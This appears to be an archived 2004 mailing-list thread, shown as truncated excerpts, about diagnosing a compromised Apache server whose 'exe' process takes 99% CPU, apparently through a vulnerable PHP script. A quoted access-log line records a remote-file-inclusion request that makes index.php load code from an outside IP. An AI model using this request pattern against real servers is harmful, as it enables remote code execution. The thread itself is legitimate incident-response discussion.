Re: apache / exe process taking 99 % cpu

Am Montag, 13. September 2004 14:07 schrieb [EMAIL PROTECTED]: > I tried to download file at 142.176.141.5/tmp ("exe" file itself), but > it says 404 not found. There are several IP adresses, so maybe someone > will have better luck. We have managed to catch the uploaded binary. After decompressin

Re: Re: apache / exe process taking 99 % cpu

I also googled after the ip address of that remote box to which the alleged apache proc had a connection and found these links: http://www.linux.org.ru/view-message.jsp?msgid=632105&back=view-group.jsp%3Fgroup%3D7300

Re: apache / exe process taking 99 % cpu

Am Wednesday, 1. September 2004 14:24 schrieb Marcin Owsiany: > Check whether the index.php looks like something that was created by > the attacker, or it is just a legitimate but buggy script file. It is a normal index.php File from a legitimate user. It seems to be programmed poorly, because it

Re: apache / exe process taking 99 % cpu

On Wed, Sep 01, 2004 at 02:30:49AM +0200, Timo Veith wrote: > apache access.log: > 142.176.141.5 - - [29/Aug/2004:21:51:47 +0200] > "GET /path/to/index.php?p=http://142.176.141.5:113/ HTTP/1.1" 200 2979 > "-" "curl/7.10.3 (i686-pc-linux-gnu) libcurl/7.10.3 OpenSSL/0.9.7a > zlib/1.1.4" > > The p

Re: apache / exe process taking 99 % cpu

Am Wednesday, 1. September 2004 01:32 schrieb Marcin Owsiany: > A DoS does not necessarily mean a lot of traffic byte-wise. Remember > that it only takes 2 packets sent and one received to initiate a TCP > connection. And creating a huge number of connections certainly can be > considered a DoS. Yo

Re: apache / exe process taking 99 % cpu

On Wed, Sep 01, 2004 at 12:25:19AM +0200, Timo Veith wrote: > On Tuesday 31 August 2004 03:24, Marcin Owsiany wrote: > > On Tue, Aug 31, 2004 at 12:59:48AM +0200, Timo Veith wrote: > > > On Monday 30 August 2004 21:06, Marcin Owsiany wrote: > > > I added a iptables rule to the OUTPUT chain dropping

Re: apache / exe process taking 99 % cpu

On Wed, Sep 01, 2004 at 12:25:19AM +0200, Timo Veith wrote: > > I seems to be a php issue. I > searched through all php files that "include" or "fopen" something ... > whew there are way too many. > > Any ideas ? If you have pristine logfiles for apache you might want to look for suspicious

Re: apache / exe process taking 99 % cpu

On Tuesday 31 August 2004 03:24, Marcin Owsiany wrote: > On Tue, Aug 31, 2004 at 12:59:48AM +0200, Timo Veith wrote: > > On Monday 30 August 2004 21:06, Marcin Owsiany wrote: > > I added a iptables rule to the OUTPUT chain dropping all tcp packets to > > that box:port and guess what? My server was

Re: apache / exe process taking 99 % cpu

On Tue, Aug 31, 2004 at 12:59:48AM +0200, Timo Veith wrote: > On Monday 30 August 2004 21:06, Marcin Owsiany wrote: > I added a iptables rule to the OUTPUT chain dropping all tcp packets to that > box:port and guess what? My server was back idle again. No more 99 % cpu > usage and the process now

Re: apache / exe process taking 99 % cpu

Hello Marcin, thank you for your reply. On Monday 30 August 2004 21:06, Marcin Owsiany wrote: > On Mon, Aug 30, 2004 at 03:50:35PM +0200, Timo Veith wrote: > > My question is, have I been hacked? > > Probably. Do you run PHP? Buggy PHP scripts are a common attack vector > these days. Yes, we do

Re: apache / exe process taking 99 % cpu

On Mon, Aug 30, 2004 at 03:50:35PM +0200, Timo Veith wrote: > My question is, have I been hacked? Probably. Do you run PHP? Buggy PHP scripts are a common attack vector these days. > Could that be a CGI program gone wild? Yes, if the "pid changes" you noted are just independent processes. Less

apache / exe process taking 99 % cpu

Hi list, I have a apache process which takes 99 % cpu. Its not common that a apache proc takes that much cpu on this system. I noticed it on my rrd load and cpu usage graph. It's on since yesterday about 22:00. top also lists the process with a name of "exe". Running under the user id of www-d